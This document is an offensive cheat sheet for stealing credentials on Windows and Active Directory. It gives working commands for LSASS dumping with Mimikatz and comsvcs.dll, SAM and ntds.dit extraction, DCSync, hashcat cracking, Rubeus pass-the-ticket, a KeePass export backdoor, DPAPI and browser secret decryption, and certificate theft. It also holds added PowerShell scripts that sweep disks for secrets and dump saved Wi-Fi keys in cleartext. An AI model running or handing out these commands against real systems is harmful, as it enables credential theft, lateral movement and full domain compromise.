Allow non-RID-500 local admins to authenticate remotely (admin shares, pass-the-hash) by disabling UAC remote restrictions, then restart the Server service
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-Service LanmanServer | Restart-Service -Verbose
Find credentials in files
Get-ChildItem -path C:\Windows\Repair\* -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\Windows\System32\config\RegBack\* -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\* -include *.SAM*,*.SYSTEM* -force -Recurse
Check the registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Find autologon credentials in the registry (Winlogon key)
Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"
Look for unattend and sysprep files
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\Panther\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\system32\* -Recurse -Include *sysprep.xml*, *sysprep.inf*
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*, *sysprep.xml*, *sysprep.inf*
Get the PowerShell history file path and read it
(Get-PSReadlineOption).HistorySavePath
Get-Content <path>
Look for powershell history files
Get-Childitem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue
Look for hardcoded passwords in scripts
Get-ChildItem -path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "password"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path C:\* -Recurse -Include *.xml,*.ps1,*.bat,*.txt | Select-String "creds"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path "C:\Users\*" -Recurse -Include *accessTokens.json*, *TokenCache.dat*, *AzureRmContext.json*
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
Get-ChildItem C:\users\ -Recurse -include *keytab* -erroraction silentlycontinue
Get-ChildItem C:\ -Recurse -include *keytab* -erroraction silentlycontinue
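The searches above are one-liners per pattern. As an added example (not from the original page), the two functions below sweep the same locations in one pass: one matches credential-looking strings inside text files and writes a CSV report, the other finds files whose names alone are interesting (hive copies, keytabs, Azure token caches, KeePass databases). The root paths, file masks and regex are assumptions to tune per engagement; access errors are silenced so the sweep does not stop on protected directories.

```powershell
# Added example: sweep for credential material on disk. Paths, masks and the regex are assumptions.
function Find-CredentialStrings {
    param(
        [string[]]$Roots   = @("$env:SystemDrive\Users", "$env:SystemDrive\inetpub", "$env:ProgramData", "$env:SystemDrive\Scripts"),
        [string[]]$Include = @('*.xml','*.ps1','*.psm1','*.bat','*.cmd','*.txt','*.ini','*.config','*.json','*.yml','*.yaml','*.conf','*.cnf'),
        # password= / pwd: / client_secret= style assignments; Select-String is case-insensitive by default
        [string]$Pattern   = '(password|passwd|pwd|secret|creds?|connectionstring|api[_-]?key|client_secret)\s*[=:]\s*\S+',
        [long]$MaxBytes    = 5MB,
        [string]$Report    = "$env:PUBLIC\cred_report.csv"
    )
    $hits = foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -Path (Join-Path $root '*') -Recurse -Force -File -Include $Include -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -gt 0 -and $_.Length -le $MaxBytes } |   # skip empty and huge files
            Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    Path    = $_.Path
                    Line    = $_.LineNumber
                    Match   = $_.Matches[0].Value
                    # truncated so a giant minified line does not flood the report
                    Snippet = if ($_.Line.Length -gt 160) { $_.Line.Substring(0, 160) } else { $_.Line }
                }
            }
    }
    if ($hits) { $hits | Export-Csv -Path $Report -NoTypeInformation }
    $hits
}

function Find-CredentialFiles {
    param([string[]]$Roots = @("$env:SystemDrive\"), [long]$MaxBytes = 50MB)
    # File names that commonly hold secrets (assumed list; extend as needed)
    $names = @('*.kdbx','*.ppk','id_rsa','id_ed25519','*.pem','*.pfx','*.p12','*keytab*','*.rdp','web.config',
               'unattend*.xml','sysprep*.inf','sysprep*.xml','ConsoleHost_history.txt','*.SAM*','*.SYSTEM*',
               'accessTokens.json','TokenCache.dat','AzureRmContext.json','.vault-token','*.ovpn')
    foreach ($root in $Roots) {
        Get-ChildItem -Path (Join-Path $root '*') -Recurse -Force -File -Include $names -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -le $MaxBytes } |
            Select-Object FullName, Length, LastWriteTime
    }
}

Find-CredentialFiles   | Format-Table -AutoSize
Find-CredentialStrings | Format-Table Path, Line, Match -AutoSize
```

Run it from an elevated shell to reach other users' profiles; as a standard user it still covers the current profile, ProgramData and web roots.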
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy
Invoke-MimiKatz -DumpCreds
Dump credentials on a local machine using Mimikatz.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys"
Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).
SharpKatz.exe --Command ekeys
Dump credentials using Dumpert (Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
Using pypykatz (Mimikatz functionality in Python)
Task Manager method: find lsass.exe in the Details tab, right click it and select Create dump file (elevated session required)
Or from an elevated shell, using the MiniDump export of comsvcs.dll
Get-Process lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
reg save HKLM\SAM SamBkup.hiv /Y
reg save HKLM\System SystemBkup.hiv /Y
reg save HKLM\Security SecurityBkup.hiv /Y
mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv SecurityBkup.hiv
Copy the SYSTEM hive and ntds.dit (ntds.dit is locked while NTDS is running; take both from a shadow copy or a backup, see the vssadmin steps below)
Copy-Item C:\Windows\system32\config\SYSTEM <PATH>
Copy-Item C:\Windows\ntds\ntds.dit <PATH>
unblock-file DSInternals_v4.7.zip
expand-archive DSInternals_v4.7.zip -DestinationPath C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals
$key = Get-BootKey -SystemHiveFilePath <PATH TO SYSTEM>
Get-ADDBAccount -All -BootKey $key -DBPath <PATH TO ntds.dit>
Get-ADDBAccount -samaccountname administrator -BootKey $key -DBPath <PATH TO ntds.dit>
Create shadowcopy of the C:\ drive
wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Copy the NTDS.dit, SYSTEM and SECURITY hives
wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"
$creds = Get-Credential
New-PSDrive -Credential $creds -Name j -Root \\<DC FQDN>\c$\temp -PSProvider FileSystem
Extract credentials
python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local
If the hash file carries usernames in <USERNAME>:<HASH> format, add --username so hashcat ignores the prefix
NTLM (-m 1000) hash format: 5b184274dcba7bfd289e8a4f439676a4
.\hashcat.exe -a 0 -m 1000 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
Domain cached credentials DCC2 (-m 2100) format: $DCC2$10240#user#7eb833ab3bddade058de4bc672debdde
.\hashcat.exe -a 0 -m 2100 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
NetNTLMv2 (-m 5600) format: admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
.\hashcat.exe -a 0 -m 5600 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O
Mimikatz dump credentials on local machine
Invoke-Mimikatz -Dumpcreds
Mimikatz dump credentials on multiple remote machines
Invoke-Mimikatz -Dumpcreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME2>")
Mimikatz DCSync attack specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'
Mimikatz DCSync attack everything
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
Invoke-Mimikatz -DumpCerts
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'
Mimikatz dump all to find privs
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'
Rubeus options: /outfile:<FILE> saves the ticket to a file, /nowrap prints the base64 ticket on one line for easier copying, /ptt injects the ticket into the current logon session
.\Rubeus.exe asktgt /user:<USER> /password:<PASSWORD> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<BASE64 TGT> /service:cifs/<FQDN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<TGT FILE KIRBI> /service:cifs/<FQDN> /ptt
./Rubeus.exe triage
./Rubeus.exe dump /luid:<ID> /service:<SERVICE> /nowrap
[System.IO.File]::WriteAllBytes("C:\Users\public\ticket.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))
./Rubeus.exe describe /ticket:<TICKET FILE>
.\Rubeus.exe ptt /ticket:<TICKET BASE64>
.\Rubeus.exe ptt /ticket:<PATH TO KIRBI FILE>
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Gain access to a domain computer if we have its RC4, AES256 or TGT.
There are means of obtaining a TGT for a computer without already having local admin access to it, such as pairing the Printer Bug and a machine with unconstrained delegation, NTLM relaying scenarios and Active Directory Certificate Service abuse
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:<LUID> /service:krbtgt
Check for user to impersonate
Get-DomainUser | ? {!($_.memberof -Match "Protected Users")} | select samaccountname, memberof
Any user can be impersonated except members of "Protected Users" and accounts flagged "This account is sensitive and cannot be delegated" (NOT_DELEGATED).
Pick one that is local admin on the target machine.
.\Rubeus.exe s4u /impersonateuser:<USER> /self /altservice:cifs/<COMPUTER FQDN> /user:<COMPUTERNAME>$ /ticket:<TGT TICKET> /nowrap
.\Rubeus.exe ptt /ticket:<TICKET BASE64>
.\Rubeus.exe ptt /ticket:<PATH TO KIRBI FILE>
Execute ls on the computer
ls \\<COMPUTERNAME FQDN>\C$
Unprotect pfx file for authentication certipy
certipy cert -export -pfx "cert.pfx" -password "<PASSWORD>" -out "cert-unprotected.pfx"
certipy auth returns the account's NT hash and writes a .ccache that can be used for Kerberos authentication
certipy auth -pfx "cert-unprotected.pfx" -dc-ip <DC IP>
List all tokens on a machine
Invoke-TokenManipulation -ShowAll
List all unique, usable tokens on the machine
Invoke-TokenManipulation -Enumerate
Start a new process with token of a specific user
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
Start a new process with the token of another process
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500
Get key from saved wifi network
netsh wlan show profiles name=<NAME> key=clear
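The netsh command above needs the profile name. As an added example that is not from the original page, the function below enumerates every saved profile and pulls each cleartext key in one pass. It parses the English-locale labels "All User Profile" and "Key Content"; on other locales those strings differ and would have to be adjusted. Run it elevated to read keys for profiles created by other users; open and 802.1X (EAP) networks have no key to show.

```powershell
# Added example: dump all saved WLAN profiles with their cleartext keys (English netsh output assumed).
function Get-SavedWlanKeys {
    # One "All User Profile     : <name>" line per saved network
    $names = netsh wlan show profiles | ForEach-Object {
        if ($_ -match '^\s*All User Profile\s*:\s*(.+?)\s*$') { $Matches[1] }
    }
    foreach ($name in $names) {
        $detail = netsh wlan show profile name="$name" key=clear
        # pull the first "<label> : <value>" line out of the profile dump
        $field = {
            param($label)
            $detail | ForEach-Object { if ($_ -match "^\s*$label\s*:\s*(.+?)\s*$") { $Matches[1] } } | Select-Object -First 1
        }
        [pscustomobject]@{
            Profile        = $name
            Authentication = & $field 'Authentication'
            Key            = & $field 'Key Content'      # empty for open or EAP/802.1X networks
        }
    }
}

Get-SavedWlanKeys | Format-Table -AutoSize
```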
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials" /all
vaultcmd /listcreds:"Web Credentials" /all
./Seatbelt.exe WindowsVault
./Seatbelt.exe WindowsCredentialFiles
Read creds with credz.txt
python3 DonPAPI.py -credz credz.txt <DOMAIN>/<USER>:<PASSWORD>@<IP>
Retrieve backup key with DA
python3 dpapi.py backupkeys --export -t <DOMAIN>/<USER>:<PASSWORD>@<IP>
Read all creds with backup key
python3 DonPAPI.py -pvk domain_backupkey.pvk <DOMAIN>/<USER>:<PASSWORD>@<IP>
List vault of the current user
Invoke-Mimikatz -Command '"vault::list"'
Can be in Roaming or Local for all commands!
ls C:\Users\<USER>\AppData\Local\Microsoft\Credentials -Hidden
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials -Hidden
./Seatbelt.exe WindowsCredentialFiles
Find master encryption key ID
The pbData field holds the encrypted data; guidMasterKey is the GUID of the master key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<BLOB ID>"'
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID> -Hidden
Get master encryption key
Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /rpc"'
Get master encryption keys from memory
If not recently used it won't be in memory
Invoke-Mimikatz -Command '"sekurlsa::dpapi"'
Get MasterKey with User's Password
Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /sid:<USER SID> /password:<PASSWORD> /protected"'
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'
Invoke-Mimikatz -Command '"dpapi::cred /patch"'
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
Find master encryption key ID
The pbData field holds the encrypted data; guidMasterKey is the GUID of the master key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID>"'
mimikatz !sekurlsa::dpapi (Cobalt Strike syntax: the ! runs mimikatz as SYSTEM, which is needed to see the SYSTEM profile's masterkeys)
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'
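Both "Find master encryption key ID" steps above (user profile and SYSTEM profile) only need the blob header, so mimikatz is not strictly required for that step. As an added example that is not from the original page, the parser below reads the DPAPI_BLOB header straight out of a file in a Credentials\ folder (12-byte credential-file header followed by the blob) or a raw blob, verifies the fixed provider GUID, and returns the guidMasterKey to look for under Protect\<SID>\ together with the cipher and hash algorithm IDs. The sample bytes at the end are a fabricated blob constructed inline for demonstration; the master key GUID in it is not real.

```powershell
# Added example: extract guidMasterKey and algorithm IDs from a DPAPI credential file / blob.
function Get-DpapiBlobInfo {
    param([Parameter(Mandatory)][byte[]]$Bytes, [string]$Source = '<bytes>')
    $provider = [guid]'df9d8cd0-1501-11d1-8c7a-00c04fc297eb'   # constant DPAPI provider GUID
    $algNames = @{ 0x6610 = 'CALG_AES_256'; 0x6603 = 'CALG_3DES'; 0x800e = 'CALG_SHA_512'; 0x8004 = 'CALG_SHA1' }
    # A credential file wraps the blob in a 12-byte header (version, blob size, unknown);
    # a raw blob starts at offset 0. Locate the blob by its provider GUID at blob+4.
    $off = -1
    foreach ($cand in 0, 12) {
        if ($Bytes.Length -ge ($cand + 44) -and ([guid][byte[]]$Bytes[($cand + 4)..($cand + 19)]) -eq $provider) { $off = $cand; break }
    }
    if ($off -lt 0) { throw "$Source : DPAPI provider GUID not found at offset 4 or 16" }
    $r = [System.IO.BinaryReader]::new([System.IO.MemoryStream]::new($Bytes))
    $null = $r.BaseStream.Seek($off, 'Begin')
    $version   = $r.ReadUInt32()
    $null      = $r.ReadBytes(16)                   # guidProvider (already verified)
    $mkVersion = $r.ReadUInt32()
    $mkGuid    = [guid]$r.ReadBytes(16)             # guidMasterKey: the file under Protect\<SID>\ to decrypt
    $flags     = $r.ReadUInt32()
    $descLen   = $r.ReadUInt32()
    $desc      = [Text.Encoding]::Unicode.GetString($r.ReadBytes($descLen)).TrimEnd([char]0)
    $cryptAlg  = $r.ReadUInt32(); $null = $r.ReadUInt32()           # algCrypt, dwAlgCryptLen
    $saltLen   = $r.ReadUInt32(); $null = $r.ReadBytes($saltLen)    # salt
    $hmacLen   = $r.ReadUInt32(); $null = $r.ReadBytes($hmacLen)    # HMAC key (usually empty)
    $hashAlg   = $r.ReadUInt32()                                    # algHash
    [pscustomobject]@{
        Source        = $Source
        BlobOffset    = $off
        Version       = $version
        MasterKeyGuid = $mkGuid
        MasterKeyVer  = $mkVersion
        Flags         = '0x{0:x8}' -f $flags
        Description   = $desc
        CryptAlg      = if ($algNames.ContainsKey([int]$cryptAlg)) { $algNames[[int]$cryptAlg] } else { '0x{0:x}' -f $cryptAlg }
        HashAlg       = if ($algNames.ContainsKey([int]$hashAlg))  { $algNames[[int]$hashAlg] }  else { '0x{0:x}' -f $hashAlg }
    }
}

function Get-DpapiBlobFile([string]$Path) { Get-DpapiBlobInfo -Bytes ([IO.File]::ReadAllBytes($Path)) -Source $Path }

# Sweep the current user's credential files (Roaming and Local):
# Get-ChildItem "$env:APPDATA\Microsoft\Credentials", "$env:LOCALAPPDATA\Microsoft\Credentials" -Force -File -ErrorAction SilentlyContinue |
#     ForEach-Object { Get-DpapiBlobFile $_.FullName } | Format-Table Source, MasterKeyGuid, Description, CryptAlg

# Constructed sample (fabricated bytes, not a real credential file): 12-byte header + minimal blob
function U32([uint32]$v) { [BitConverter]::GetBytes($v) }
$descBytes = [Text.Encoding]::Unicode.GetBytes("Local Credential Data`0")
$sample = [byte[]]( (U32 1) + (U32 0) + (U32 0) +                                    # credential-file header
    (U32 1) + ([guid]'df9d8cd0-1501-11d1-8c7a-00c04fc297eb').ToByteArray() +        # version, guidProvider
    (U32 1) + ([guid]'11111111-2222-3333-4444-555555555555').ToByteArray() +        # mk version, fake guidMasterKey
    (U32 0) + (U32 $descBytes.Length) + $descBytes +                                 # flags, description
    (U32 0x6610) + (U32 256) + (U32 4) + [byte[]](1, 2, 3, 4) + (U32 0) + (U32 0x800e) )  # AES-256, salt, no hmac key, SHA-512
Get-DpapiBlobInfo -Bytes $sample -Source 'constructed' | Format-List
```

On the sample this reports BlobOffset 12, MasterKeyGuid 11111111-2222-3333-4444-555555555555, CALG_AES_256 and CALG_SHA_512; on a real file the GUID is the name of the masterkey file to feed into dpapi::masterkey.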
A non-empty Login Data file is a good indication that credentials are saved in the browser
ls "$env:LOCALAPPDATA\google\chrome\USERDA~1\default\"
ls C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default
.\SharpChromium.exe logins
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /masterkey:<KEY>
type %APPDATA%\KeePass\KeePass.config.xml
tasklist | findstr /I keepass
dir /s "C:\" | findstr "KeePass"
Get-Process keepass
Get-KeePassDatabaseKey -Verbose
Create a backdoor trigger in the KeePass config that exports the opened database to ExportPath
Find-KeePassconfig -Path $env:appdata\KeePass
Get-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose
Add-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose -ExportPath C:\users\public\
keepass2john Passwords.kdbx > hash.txt
hashcat -m 13400 -a 0 hash.txt rockyou.txt -r dive.rule
sudo apt install putty-tools
puttygen privkey.ppk -O private-openssh -o priv_key
proxychains ssh -i priv_key <USER>@<IP>
Start a netsh packet capture (stop it before converting)
netsh trace start capture=yes
netsh trace stop
Transform the .etl file into a pcapng file
.\etl2pcapng.exe NetTrace.etl capture.pcapng
Open the capture in a preferred tool such as Wireshark
Check for virtual disks on the system
Get-Childitem -Path C:\Users\* -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\ -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get the VHDX location of VM
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD | Select-Object Path
Mount-VHD -Path "<PATH TO VHDX>" -PassThru
Get-Disk | Get-Partition | Get-Volume
Copy sensitive files and extract credentials
Example: SAM, SECURITY and SYSTEM hives or ntds.dit from the mounted volume (D: here)
copy-item D:\Windows\system32\config\SAM C:\users\public\
copy-item D:\Windows\system32\config\SECURITY C:\users\public\
copy-item D:\Windows\system32\config\SYSTEM C:\users\public\
copy-item D:\Windows\ntds\ntds.dit C:\users\public\
Dismount-VHD -Path "<PATH TO VHDX>"
Resetting a password remotely
smbpasswd.py <DOMAIN>/<USER>:<PASSWORD>@<DC> -newpass '<NEW PASSWORD>'
Via RDP (only when NLA is not enforced): log in and Windows prompts for a password change when the password is expired or must be changed at next logon
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
.\changepw.exe /d:<DOMAIN> /u:<USER> /o:<PASSWORD OLD> /p:<PASSWORD NEW>
Active Directory Certificate Services
# Current user store
certutil -user -store My
# Machine store
certutil -store My
# Current user store
.\CertifyKit.exe list
# Machine store
.\CertifyKit.exe list /storename:my /storelocation:localmachine
# User store
Get-ChildItem Cert:\CurrentUser\My -Recurse
Get-ChildItem Cert:\CurrentUser\ -Recurse
# Machine store
Get-ChildItem Cert:\LocalMachine\My -Recurse
Get-ChildItem Cert:\LocalMachine\ -Recurse
certutil -p <PASSWORD> -exportpfx <SERIAL ID> cert.pfx
Use /base64 to write the export as a base64-encoded blob for exfiltration
.\CertifyKit.exe list /certificate:<SERIAL ID> /outfile:cert.pfx
.\CertifyKit.exe list /storename:my /storelocation:localmachine /certificate:<SERIAL ID> /outfile:cert.pfx
$mypwd = ConvertTo-SecureString -String "<PASSWORD>" -Force -AsPlainText
Export-PfxCertificate -Cert Cert:\LocalMachine\My\<SERIAL ID> -FilePath cert.pfx -Password $mypwd
If the private key is marked non-exportable (CAPI or CNG), use Mimikatz to patch the export restriction (crypto::capi for CAPI keys, crypto::cng for CNG keys) and then export the private keys
.\Mimikatz.exe "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"
.\BetterSafetyKatz.exe -args "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"
THEFT2 Get User Certificate DPAPI
User certificates stored in:
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates
Disk: %APPDATA%\Microsoft\SystemCertificates\My\Certificates
User private keys:
CAPI keys: %APPDATA%\Microsoft\Crypto\RSA\<USER SID>
CNG keys %APPDATA%\Microsoft\Crypto\Keys\
SharpDPAPI find certificates
.\SharpDPAPI.exe certificates
SharpDPAPI Dump certificates using password
.\SharpDPAPI.exe certificates /password:<PASSWORD>
Mimikatz Dump in users context
dpapi::masterkey /in:"<PATH TO KEY>" /rpc
Mimikatz Dump using the password
dpapi::masterkey /in:"<PATH TO KEY>" /sid:<USER SID> /password:<PASSWORD>
SharpDPAPI decrypt masterkeys using domain backup key
.\SharpDPAPI.exe certificates /pvk:<KEY>
Convert Pem to PFX with openssl
Save the private key and cert to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Add /getcredentials to also retrieve the NTLM hash
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
THEFT3 Machine Certificate DPAPI
SharpDPAPI Dump machine certificates
.\SharpDPAPI.exe certificates /machine
Mimikatz Dump machine certificates
lsadump::secrets
crypto::certificates /export /systemstore:LOCAL_MACHINE
THEFT4 Certificates on disk
Locate certificates and private key on disk
dir C:\*.pfx C:\*.pem C:\*.p12 C:\*.crt C:\*.cer C:\*.p7b C:\*.ovpn /s /b
Get-ChildItem C:\ -include ('*.pem', '*.pfx', '*.p12', '*.crt', '*.cer', '*.key', '*.ovpn') -recurse -erroraction 'silentlycontinue'
.\Seatbelt.exe --group=InterestingFiles
certutil -dump -v <PATH TO CERT>
dir C:\*.ovpn /s /b
Get-ChildItem C:\ -include ('*.ovpn') -recurse -erroraction 'silentlycontinue'
HashiCorp can be used to store secrets such as certificates https://www.vaultproject.io/
Vault splits its master encryption key with Shamir's Secret Sharing into several unseal keys; a configured threshold of them (default 3 of 5) must be supplied to unseal the vault.
Once logged in, Vault issues an access token that is subject to Vault policies. Policies are ACLs that decide which users may view, modify or update content in the vault.
Even with root access to the machine hosting Vault, the vault contents can only be read with a valid token obtained through an enabled authentication method such as ldap, userpass or token.
When authentication is done with the Vault CLI, a .vault-token file is written to the current user's home directory. If that file belongs to a high-privileged Vault user, it can be used to escalate privileges.
sudo nmap -p 8200 <RANGE> -sV -sC -Pn -n
vault status -address=https://<IP>:8200
Get-ChildItem C:\Users\ -Recurse -Include '.vault-token' -Force
find / -name '.vault-token'
cat /root/.vault-token
Authenticate with vault token
vault login -address=https://<IP>:8200 -method=token <TOKEN>
vault login -address=https://<IP>:8200 -method=ldap username=<USERNAME>
Run multiple times for multiple keys
vault operator unseal -address=https://<IP>:8200
List all vault secrets and folders
vault secrets list -address=https://<IP>:8200
List kv secrets of folder
vault kv list -address=https://<IP>:8200 <FOLDER>
vault kv get -address=https://<IP>:8200 <FOLDER>/<SECRET>
Enumerate roles of folder
Check allowed_extensions, allowed_users and default_user
vault list -address=https://<IP>:8200 <FOLDER>/roles
vault read -address=https://<IP>:8200 <FOLDER>/roles/<ROLE>
Use the public key of a user
Save signed public key
vault write -address=https://<IP>:8200 -field=signed_key ssh-client-signer/sign/<ROLE> public_key=@'<PATH TO PUBLIC KEY>'
ssh -i <PATH TO SIGNED PUBLIC KEY> -i <PATH TO PRIVATE KEY> <USER>@<TARGET>
Linux stores certificates in /etc/ssl directories or in flat NSS SQLite database files.
On Linux, certutil and pk12util are two tools that can be used to manage private keys and certificates using NSS databases and NSS tokens.
We can use certutil to view and initialize a NSS database for certificate storage.
certutil -d $HOME/.pki/nssdb -N
pk12util -i internaluser.p12 -d $HOME/.pki/nssdb
certutil -L -d <FILE TO nssdb>
certutil -L -d <FILE TO nssdb> -a -n "<CERT NICKNAME>"
certutil -K -d <FILE TO nssdb>
Export cert and private key
pk12util -o certandkey.pfx -n "<CERT NICKNAME>" -d <FILE TO nssdb>
certutil -v -dump -p <PASSWORD> <PATH TO PFX>
.\Rubeus.exe asktgt /user:<USER> /certificate:certandkey.p12 /domain:<DOMAIN> /ptt
Pass the certificate Request TGT
Add /getcredentials to also retrieve the NTLM hash (UnPAC-the-hash attack). The /certificate value can also be a base64-encoded PFX instead of a file path.
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
certipy auth -pfx '<PATH TO cert.pfx>'
.\Rubeus.exe asktgt /getcredentials /user:<COMPUTERACCOUNT>$ /certificate:<PATH TO PFX> /password:<PASSWORD OF PFX> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /show
certipy auth -pfx '<PATH TO cert.pfx>' -dc-ip <DC IP>
EFS can be used to encrypt files. An EFS certificate is required to be imported into the current user's certificate store and permission to modify the target file is required.
A recovery agent (DRA) can read or recover data encrypted with EFS; in a domain the built-in domain Administrator account is the default DRA
Microsoft details two methods to perform decryption operations:
Retrieve the original EFS certificate used to encrypt the file and import it in the target computer certificate store.
Use an EFS DRA certificate to restore an EFS encrypted file if the original EFS certificate used to encrypt the file is lost.
cipher.exe switches useful for locating encrypted files:
/h  Displays files with hidden or system attributes, which are skipped by default.
/u /n  Lists all encrypted files on the local drives; with /n no keys are updated, so nothing is changed.
Check .pfx file for EFS EKU
Check for EKU
